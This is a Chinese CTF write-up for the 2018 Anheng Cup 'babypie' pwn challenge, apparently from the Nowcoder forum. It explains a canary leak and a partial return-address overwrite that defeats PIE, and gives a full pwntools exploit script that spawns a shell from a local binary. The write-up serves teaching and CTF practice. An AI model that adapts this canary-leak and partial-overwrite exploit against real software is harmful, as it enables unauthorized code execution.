2018 - 安恒杯 - babypie [stack partial overwrite]

明显的是缓冲区溢出呀,read函数可以多读

64位程序,开启了NX和PIE,且程序里有了system("/bin/sh")

目标:控制RIP到A3E函数即可~

首先,要处理canary的问题~然后,覆盖返回地址~

partial overwrite:在开启了PIE后,无论高位地址如何变化,低位地址是不变的,意味着有概率“撞到”正确的地址

exp如下:

#!/usr/bin/env python
# coding=utf-8

from pwn import *

while True:
    try:
        io = process("./babypie", timeout = 1)
        io.sendafter(":\n", "A" * (0x30 - 0x8 + 1))
        io.recvuntil("A" * (0x30 - 0x8 + 1))
        canary = '\0' + io.recvn(7)
        success("0x" + canary.encode("hex"))
        io.sendafter(":\n", "A" * (0x30 - 0x8) + canary + "B" * 8 + '\x3E\x0A')
        io.interactive()
    except Exception as e:
        io.close()
        print e

参考链接:

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/fancy-rop/#partial-overwrite

全部评论

相关推荐

不愿透露姓名的神秘牛友
11-29 12:39
点赞 评论 收藏
分享
11-28 19:45
哈尔滨理工大学 算法工程师
点赞 评论 收藏
分享
11-01 11:02
门头沟学院 后端
点赞 评论 收藏
分享
不愿透露姓名的神秘牛友
10-05 10:13
已编辑
红利真好啊
我也想随便进大厂把车门焊死然后diss后面的人不努力呀😌
HHHHaos:让这些老登来现在秋招一下,简历都过不去
点赞 评论 收藏
分享
12-01 16:09
清华大学附属小学 Java
点赞 评论 收藏
分享
评论
点赞
收藏
分享

全站热榜

正在热议
# 25届秋招总结 #
451229次浏览 4613人参与
# 如何排解工作中的焦虑 #
72356次浏览 1008人参与
# 地方国企笔面经互助 #
8314次浏览 18人参与
# 同bg的你秋招战况如何? #
82380次浏览 603人参与
# 找工作时遇到的神仙HR #
565432次浏览 3851人参与
# 实习,投递多份简历没人回复怎么办 #
2458848次浏览 34886人参与
# 虾皮求职进展汇总 #
122287次浏览 913人参与
# 比亚迪工作体验 #
45086次浏览 214人参与
# 春招别灰心,我们一人来一句鼓励 #
44555次浏览 554人参与
# 现在还是0offer,延毕还是备考 #
826456次浏览 6925人参与
# 你最近一次加班是什么时候? #
22279次浏览 203人参与
# 提前批简历挂麻了怎么办 #
150381次浏览 1980人参与
# 校招入职后的感受 #
162856次浏览 1988人参与
# 如果公司给你放一天假,你会怎么度过? #
4899次浏览 63人参与
# 百度秋招提前批进度 #
87878次浏览 1045人参与
# 发工资后,你做的第一件事是什么 #
13617次浏览 63人参与
# 实习必须要去大厂吗? #
56156次浏览 965人参与
# 双非本科求职如何逆袭 #
664007次浏览 7413人参与
# 晒一晒我的offer #
10009642次浏览 106268人参与
# 查收我的offer竞争力报告 #
37991次浏览 424人参与
牛客网
牛客企业服务